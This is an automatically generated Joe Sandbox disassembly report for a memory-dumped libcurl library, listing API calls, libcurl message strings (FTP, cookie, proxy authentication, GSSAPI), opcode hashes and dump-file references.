                                                                                                                            • String ID: Accept-ranges: bytes$Can't get the size of file.$Content-Length: %I64d$Last-Modified: %s, %02d %s %4d %02d:%02d:%02d GMT%s$failed to resume file:// transfer
                                                                                                                            • API String ID: 601868998-1509146019
                                                                                                                            • Opcode ID: 98f7d449c6bfa1ca15b7a9835ae2746441344d3c1c49412aee0be5b1c7b32dfa
                                                                                                                            • Instruction ID: 634b1118eafc5989245f7bd42f4f1f3293f54e57dd838adf67f371553bba65de
                                                                                                                            • Opcode Fuzzy Hash: 98f7d449c6bfa1ca15b7a9835ae2746441344d3c1c49412aee0be5b1c7b32dfa
                                                                                                                            • Instruction Fuzzy Hash: 3CD1B5B1E052189BEB208B78DD41BEEB7B6EF45304F0040E9E94DA7251EB795E84CF52
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            • Request has same path as previous transfer, xrefs: 6B6CD68E
                                                                                                                            • Uploading to a URL without a file name!, xrefs: 6B6CD5EB
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ___from_strstr_to_strchr_strncpy$_strrchr
                                                                                                                            • String ID: Request has same path as previous transfer$Uploading to a URL without a file name!
                                                                                                                            • API String ID: 2378022753-131330169
                                                                                                                            • Opcode ID: cdf88c9ce463338a7db816b0a20c62d7f4484c21747a840acdb8a6d79eb0e5ea
                                                                                                                            • Instruction ID: 3a3ba580c8aac3caf7216a29d0aa8fd6b6fcbac099a50cd1788aadeaa10312bc
                                                                                                                            • Opcode Fuzzy Hash: cdf88c9ce463338a7db816b0a20c62d7f4484c21747a840acdb8a6d79eb0e5ea
                                                                                                                            • Instruction Fuzzy Hash: 319109B0EC4206ABDB049F34C845B9B7BB5EF05349F4041B9E91C9B241EB3AE955CB92
                                                                                                                            APIs
                                                                                                                            • curl_mfprintf.LIBCURL(?,%s,00000000), ref: 6B6C679A
                                                                                                                            Strings
                                                                                                                            • # Netscape HTTP Cookie File# https://curl.haxx.se/docs/http-cookies.html# This file was generated by libcurl! Edit at your own risk., xrefs: 6B6C6707
                                                                                                                            • %s.%s.tmp, xrefs: 6B6C66C1
                                                                                                                            • %s, xrefs: 6B6C6792
                                                                                                                            • ## Fatal libcurl error, xrefs: 6B6C67F5
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: curl_mfprintf
                                                                                                                            • String ID: ## Fatal libcurl error$# Netscape HTTP Cookie File# https://curl.haxx.se/docs/http-cookies.html# This file was generated by libcurl! Edit at your own risk.$%s$%s.%s.tmp
                                                                                                                            • API String ID: 8901498-4087121635
                                                                                                                            • Opcode ID: 8c9f91b2b9dd09e41646499e2bd255609ed6bab9927efc7c56afc9f99fa9414c
                                                                                                                            • Instruction ID: dfa56364d59a99fe1429faf0f93a7fbf28a3ed93a85161bf7c41ecad162bf21c
                                                                                                                            • Opcode Fuzzy Hash: 8c9f91b2b9dd09e41646499e2bd255609ed6bab9927efc7c56afc9f99fa9414c
                                                                                                                            • Instruction Fuzzy Hash: EB61C5F1E042499BDF009FB899967FF7B74DF05208F0400B5ED15A7201DB6E9A1587BA
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _strstr
                                                                                                                            • String ID: $ bytes$Data conn was not available immediately$Getting file with size: %I64d$Maxdownload = %I64d$RETR response: %03d
                                                                                                                            • API String ID: 2882301372-2096918210
                                                                                                                            • Opcode ID: 8290ebe91560c22c55ef0b3e341de28725afcb1cc9b361f31e2de5889394c699
                                                                                                                            • Instruction ID: 96789ce383bd04674a701ef3648d321ea016b8b75076bff557cbf469d3f5118d
                                                                                                                            • Opcode Fuzzy Hash: 8290ebe91560c22c55ef0b3e341de28725afcb1cc9b361f31e2de5889394c699
                                                                                                                            • Instruction Fuzzy Hash: 9E5116F5DC82449BDB10CFB8D84179B7BA5EB45325F0042EAED6C8B291D338D640C792
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: curl_mvsnprintf
                                                                                                                            • String ID: %s%s%s$Couldn't set desired mode$Got a %03d response code instead of the assumed 200$LIST$NLST
                                                                                                                            • API String ID: 3418963191-1262176364
                                                                                                                            • Opcode ID: 68ba51bbfc55316b71ac0a96cd6f3283158b4c639445504842a15477877eafa0
                                                                                                                            • Instruction ID: 303aaffe092a083ed2fad88b94385757016feeefe0c3b3637fb3178f410f00bc
                                                                                                                            • Opcode Fuzzy Hash: 68ba51bbfc55316b71ac0a96cd6f3283158b4c639445504842a15477877eafa0
                                                                                                                            • Instruction Fuzzy Hash: 064129F2B001146BEB105A78ED83BAB77A9DB44669F0044B6FD0DDB201E729E90487E1
                                                                                                                            APIs
                                                                                                                            • ___from_strstr_to_strchr.LIBCMT ref: 6B6DD9E9
                                                                                                                            • curl_maprintf.LIBCURL(%.*s,00000000,?,?,?,?,?,?,?,?,?,00000000,?,CONNECT,00000000,00000001), ref: 6B6DD9FE
                                                                                                                              • Part of subcall function 6B6E48E0: curl_mvaprintf.LIBCURL(?,?,?,6B6C66CB,%s.%s.tmp,?,?,?,?,?,?), ref: 6B6E48EA
                                                                                                                            • curl_maprintf.LIBCURL(%sAuthorization: Digest %s,Proxy-,?), ref: 6B6DDA61
                                                                                                                            Strings
Memory Dump Source
• Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
• Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmp
• Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmp
• Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmp
• Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
Similarity
• API ID: curl_maprintf$___from_strstr_to_strchrcurl_mvaprintf
• String ID: %.*s$%sAuthorization: Digest %s$Digest$Proxy-
• API String ID: 2694567262-3976116069
• Opcode ID: fb7b42ccafa9272e29a5c5e8ef71a97789e160fd7d39aba23cf0a8386375ec61
• Instruction ID: cd681da111291c5cca8b91e5663ef7c99c9a4c8b143f86e1a0535c4608983f6c
• Instruction Fuzzy Hash: DE4175B1A04249EFDB00DFA8D881BAD7BE5EF45345F0480BAF908DB351E735DA548BA1
APIs
• curl_mime_data.LIBCURL(?,?,?), ref: 6B6E2917
• curl_mime_filedata.LIBCURL(?,?), ref: 6B6E292A
• curl_mime_data_cb.LIBCURL(?,?,?,?,?,?,?), ref: 6B6E2955
• curl_mime_init.LIBCURL ref: 6B6E2963
• curl_mime_subparts.LIBCURL(?,00000000), ref: 6B6E2976
• curl_mime_addpart.LIBCURL(00000000), ref: 6B6E299D
• curl_slist_free_all.LIBCURL(00000000,?), ref: 6B6E2A1B
• curl_slist_free_all.LIBCURL(?,?), ref: 6B6E2A44
Similarity
• API ID: curl_slist_free_all$curl_mime_addpartcurl_mime_datacurl_mime_data_cbcurl_mime_filedatacurl_mime_initcurl_mime_subparts
• String ID:
• API String ID: 3177825088-0
• Opcode ID: 364637ce9c6135f1bbe082f9c174ab8bbb885e5a07112bfcc50d1ad14a7a9042
• Instruction ID: cc499bcc60937daa1f63f82483fa7fda9518ea249878dd7ce8d1e37952132f69
• Instruction Fuzzy Hash: CA5137F2A06116ABDF109F29E88155B7765FF04315B0401B8ED099B705E73AE832DBF1
Similarity
• API ID: _strrchrcurl_maprintf
• String ID: %s%s$Wildcard - "%s" skipped by user$Wildcard - Parsing started$Wildcard - START of "%s"
• API String ID: 1669751406-1301414817
• Opcode ID: 1a8fc2155270accc352df8052af9171a5c3bf574f5dc9894ba67ba9ca57e908c
• Instruction ID: 9391c6fe5e15b812a7646d35185527fbe367e4ccf26cf432ed6c2e05ae955e04
• Instruction Fuzzy Hash: 76C1CFB5A006009FDB10CF28D881BD6BBE1EF45305F1440BAEA6DCB311E77AE995CB91
APIs
• curl_maprintf.LIBCURL(%sAuthorization: Negotiate %s,Proxy-,00000000,?,?,00000000,?), ref: 6B6DDF14
Similarity
• API ID: curl_maprintf
• String ID: %sAuthorization: Negotiate %s$Curl_output_negotiate, no persistent authentication: cleanup existing context$HTTP$Negotiate auth restarted$Proxy-
• API String ID: 3307269620-819322280
• Opcode ID: e489e0eae87ce2d5eb39a0f60f79a278980c21ef3696f3ae3869fb877f665ec5
• Instruction ID: 15133ecfccf4a06f428529f0b3823a93b79b064ad66da7789d187a18409683f4
• Instruction Fuzzy Hash: 5A91D5B1A04208DFEB11DF68D881BDEBBF5EF45354F0445AAE848D7200D77AA954CFA1
APIs
• WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6B6CD874
Strings
• We got a 421 - timeout!, xrefs: 6B6CD81E
• *, xrefs: 6B6CD849
• FTP response timeout, xrefs: 6B6CD8BA
• QUOT string not accepted: %s, xrefs: 6B6CD89F
• FTP response aborted due to select/poll error: %d, xrefs: 6B6CD87B
Similarity
• API ID: ErrorLast
• String ID: *$FTP response aborted due to select/poll error: %d$FTP response timeout$QUOT string not accepted: %s$We got a 421 - timeout!
• API String ID: 1452528299-2335292235
• Opcode ID: aced101b6f0d2049144f8280082dd895e95f631225b49926e849827feab5913c
• Instruction ID: 0874c80b2ea05d0c345062c39ef1b6625affef88698dffd48e7beb1c6405a3ec
• Instruction Fuzzy Hash: B15124B5E85208AFEF008E68DC817AF7BB5EF45315F1041B9ED18D7250F73996018BA6
Similarity
• API ID:
• String ID: api-ms-$ext-ms-
• API String ID: 0-537541572
• Opcode ID: ea50324db6cb33a320eb262a67188cc611bff2e55c1d81c7d3d287e11bfec9c1
• Instruction ID: 681afcbb3768cec70ccecdb827ad89c17a90cd142cf2006036355d04afad0f03
• Instruction Fuzzy Hash: E521C372D4D621BBDB21AE348E54B0E37A89F02BB0F190171FD65EF281D638E90186F0
APIs
  • Part of subcall function 6B725EB6: _free.LIBCMT ref: 6B725EDB
• _free.LIBCMT ref: 6B725F3C
  • Part of subcall function 6B71F7EA: RtlFreeHeap.NTDLL(00000000,00000000,?,6B725EE0,6B7438A0,00000000,6B7438A0,00000000,?,6B725F07,6B7438A0,00000007,6B7438A0,?,6B72532A,6B7438A0), ref: 6B71F800
  • Part of subcall function 6B71F7EA: GetLastError.KERNEL32(6B7438A0,?,6B725EE0,6B7438A0,00000000,6B7438A0,00000000,?,6B725F07,6B7438A0,00000007,6B7438A0,?,6B72532A,6B7438A0,6B7438A0), ref: 6B71F812
• _free.LIBCMT ref: 6B725F47
• _free.LIBCMT ref: 6B725F52
• _free.LIBCMT ref: 6B725FA6
• _free.LIBCMT ref: 6B725FB1
• _free.LIBCMT ref: 6B725FBC
• _free.LIBCMT ref: 6B725FC7
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: a2040689eb20bcf9bb80bc7575afd7fe6432a9a444dbacbf3969c66c2c91fe63
• Instruction ID: 8490015a070ff96eed6462e3e5e9600e50114ee79f8ef0ee00795db7fb838ca7
• Instruction Fuzzy Hash: EB113AB1945B04EAE720FBB0DE4BFCB779DBF00705F840A25F39AAA055DB79A5048660
APIs
• curl_maprintf.LIBCURL(%s%s%s%s%s%s%I64d%s%s,#HttpOnly_,6B72B98E,unknown,6B72B988,6B72B868,6B72B988,100C15FF,5D8B6B74,74DB8504,6B72B98E,00000000,00000000,00000000), ref: 6B6C6B55
Similarity
• API ID: curl_maprintf
• String ID: #HttpOnly_$%s%s%s%s%s%s%I64d%s%s$FALSE$TRUE$unknown
• API String ID: 3307269620-3622669638
• Opcode ID: 2b386d2d720d65f2000df3c4235a2cdee1005b524e700c303a5fada55f06d325
• Instruction ID: b6c878719c8e8cf22689bdd9906113c44b7ae4378d0f324395a13a202c7a8512
• Instruction Fuzzy Hash: DB1182E0700149EFEB148A65DE86B56FBE9AF49290F044699FC88DB302D375FD80C7A1
APIs
• GetConsoleCP.KERNEL32(6B7192EA,00000000,?), ref: 6B71E504
• __fassign.LIBCMT ref: 6B71E6E3
• __fassign.LIBCMT ref: 6B71E700
• WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6B71E748
• WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6B71E788
• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6B71E834
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FileWrite__fassign$ConsoleErrorLast
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4031098158-0
                                                                                                                            • Opcode ID: 0ffd9e75a69c7097195ebbb27e89874d231e73db89907e2cbb00dec8f2fbe690
                                                                                                                            • Instruction ID: 5b0f770223592078968f418f10d9eae993668fe6a03bff6fa5f66275dd11342b
                                                                                                                            • Opcode Fuzzy Hash: 0ffd9e75a69c7097195ebbb27e89874d231e73db89907e2cbb00dec8f2fbe690
                                                                                                                            • Instruction Fuzzy Hash: A7D1AB75D0525C9FDF15CFA8CA809EDBBB5BF49304F28006AE865BB241D734AA46CB60
                                                                                                                            APIs
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B6ED266
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B6ED27A
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B6ED2CC
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B6ED2F9
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B6ED362
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B6ED4C1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 885266447-0
                                                                                                                            • Opcode ID: abeba5c7b734dbb949aebf491ab6ba2712da967b0e21801e9807bd08b76ab063
                                                                                                                            • Instruction ID: 0bff210bac09aa0e82eeb767b7841219199910d940991a58711b988c8a7a733c
                                                                                                                            • Opcode Fuzzy Hash: abeba5c7b734dbb949aebf491ab6ba2712da967b0e21801e9807bd08b76ab063
                                                                                                                            • Instruction Fuzzy Hash: CBA1C2B5E452049FDB10DF68C981BAA7BB5FFC5318F1482B9EC1C9B245DB34A94187B0
                                                                                                                            APIs
                                                                                                                            • VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000004,?,?), ref: 6B70500B
                                                                                                                            • VerSetConditionMask.KERNEL32(00000000,?,00000001,00000004,?,?), ref: 6B705012
                                                                                                                            • VerSetConditionMask.KERNEL32(00000000,?,00000020,00000005,?,00000001,00000004,?,?), ref: 6B70501F
                                                                                                                            • VerSetConditionMask.KERNEL32(00000000,?,00000010,00000005,?,00000020,00000005,?,00000001,00000004,?,?), ref: 6B705026
                                                                                                                            • VerSetConditionMask.KERNEL32(00000000,?,00000008,00000001,?,00000010,00000005,?,00000020,00000005,?,00000001,00000004,?,?), ref: 6B705032
                                                                                                                            • VerifyVersionInfoA.KERNEL32(0000009C,00000033,00000000), ref: 6B70503F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ConditionMask$InfoVerifyVersion
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2793162063-0
                                                                                                                            • Opcode ID: 21decbdcb315f7962a3fd6e15d39160b837ae5f06d18c8cc1e629239003f51eb
                                                                                                                            • Instruction ID: 736ebeac5ada70eccc33d4d94b24a8db049dced31ea6db216668527ade236c80
                                                                                                                            • Opcode Fuzzy Hash: 21decbdcb315f7962a3fd6e15d39160b837ae5f06d18c8cc1e629239003f51eb
                                                                                                                            • Instruction Fuzzy Hash: FD3177B0B44358AEEF20CA388D49F9F7BF8AB56704F0400DAB54C67281C6749E548B66
                                                                                                                            APIs
                                                                                                                            • htonl.WS2_32(?), ref: 6B7065CA
                                                                                                                            • htonl.WS2_32(?), ref: 6B706626
                                                                                                                              • Part of subcall function 6B6F06B0: curl_mvsnprintf.LIBCURL(?,00000801,00000000,$lnk), ref: 6B6F06EF
                                                                                                                              • Part of subcall function 6B6F06B0: curl_msnprintf.LIBCURL(?,00000004,...,?,?,?,00000E20), ref: 6B6F072F
                                                                                                                            Strings
                                                                                                                            • GSSAPI handshake failure (invalid security layer), xrefs: 6B7065BA
                                                                                                                            • GSSAPI handshake failure (invalid security data), xrefs: 6B706583
                                                                                                                            • GSSAPI handshake failure (empty security message), xrefs: 6B706561, 6B70681F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: htonl$curl_msnprintfcurl_mvsnprintf
                                                                                                                            • String ID: GSSAPI handshake failure (empty security message)$GSSAPI handshake failure (invalid security data)$GSSAPI handshake failure (invalid security layer)
                                                                                                                            • API String ID: 3222853418-242323837
                                                                                                                            • Opcode ID: c567ce8b3f6d7b30e7ab2bcfdc1552b5b83c68f89f7c84d50e5e888a505edcb7
                                                                                                                            • Instruction ID: bb362314d800f6455e703211fc7a51064d1e5555f83308acc391911d4c65c96e
                                                                                                                            • Opcode Fuzzy Hash: c567ce8b3f6d7b30e7ab2bcfdc1552b5b83c68f89f7c84d50e5e888a505edcb7
                                                                                                                            • Instruction Fuzzy Hash: 57D157B5D00218DFCF10EFA8D955A9EBBF4FF09305F1040AAE819A7251DB3ADA55CB60
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: ../$/..$/../$/./
                                                                                                                            • API String ID: 0-456519384
                                                                                                                            • Opcode ID: 3a209b9355066934c384658341f916efc798c89429c54a47877f8fc6c87f77b4
                                                                                                                            • Instruction ID: 74cc86f50262776a38eba761cb4f1e5dfc24a7a0adc735e7f0be7447b6d83bfe
                                                                                                                            • Opcode Fuzzy Hash: 3a209b9355066934c384658341f916efc798c89429c54a47877f8fc6c87f77b4
                                                                                                                            • Instruction Fuzzy Hash: A771E7E6E0D1819AD7131E3959957A3BFA6DB5324CFA800E5D8858B3C3E72BC509C273
                                                                                                                            APIs
                                                                                                                            • curl_strnequal.LIBCURL(Set-Cookie:,00000000,0000000B,?,?,?,?,?,?,?), ref: 6B6C6449
                                                                                                                            • curl_slist_free_all.LIBCURL(?), ref: 6B6C64F5
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: curl_slist_free_allcurl_strnequal
                                                                                                                            • String ID: Set-Cookie:$ignoring failed cookie_init for %s$none
                                                                                                                            • API String ID: 2653667558-4095489131
                                                                                                                            • Opcode ID: c04a9e43c608e988b8ab08cac2914bd87252cd6f4fd3f939b0895b11ed212d5f
                                                                                                                            • Instruction ID: ed3494ca292fb18c0a6f8d9c21dc291b9d4c093fceeee73f01ce50949e314523
                                                                                                                            • Opcode Fuzzy Hash: c04a9e43c608e988b8ab08cac2914bd87252cd6f4fd3f939b0895b11ed212d5f
                                                                                                                            • Instruction Fuzzy Hash: 6E6104F1D04380AADB019F649842BBB7B75DF1670CF0880E4ED49AB242E77A9505C7AB
                                                                                                                            APIs
                                                                                                                            • curl_maprintf.LIBCURL(%sAuthorization: NTLM %s,Proxy-,00000000,?,?,?,?,?,?,00000000,?), ref: 6B6DE253
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: curl_maprintf
                                                                                                                            • String ID: %sAuthorization: NTLM %s$HTTP$Proxy-
                                                                                                                            • API String ID: 3307269620-3667642693
                                                                                                                            • Opcode ID: 3eeacf4ae96cf253503ce9e90f25a6b511ae178432059a97a03facbd9c23d962
                                                                                                                            • Instruction ID: c290fb65f753eebe35d5ccdb10b9f771e1867b7ffc5628669f04274b051f7315
                                                                                                                            • Opcode Fuzzy Hash: 3eeacf4ae96cf253503ce9e90f25a6b511ae178432059a97a03facbd9c23d962
                                                                                                                            • Instruction Fuzzy Hash: 67714EB5A00209EFDF11DFA8D9417AEBBF4FB49305F1041AAE858E7250D775AA50CFA0
                                                                                                                            APIs
                                                                                                                            • curl_strnequal.LIBCURL(NTLM,6B6DB6E6,00000004,00000DD0,?,?,?,6B6DB6E6,?,?,?,?,?,?,00000000,?), ref: 6B6DE00B
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
• Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
Similarity
